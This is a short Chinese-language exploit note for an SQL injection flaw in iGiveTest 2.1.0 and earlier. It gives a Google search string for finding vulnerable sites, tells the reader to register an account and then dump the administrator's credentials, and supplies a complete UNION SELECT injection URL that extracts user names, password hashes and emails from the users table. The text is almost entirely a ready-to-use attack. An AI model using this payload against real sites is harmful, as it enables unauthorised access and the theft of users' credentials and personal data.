iGiveTest 2.1.0注入漏洞
# Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌关键字: "Powered by iGiveTest"
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1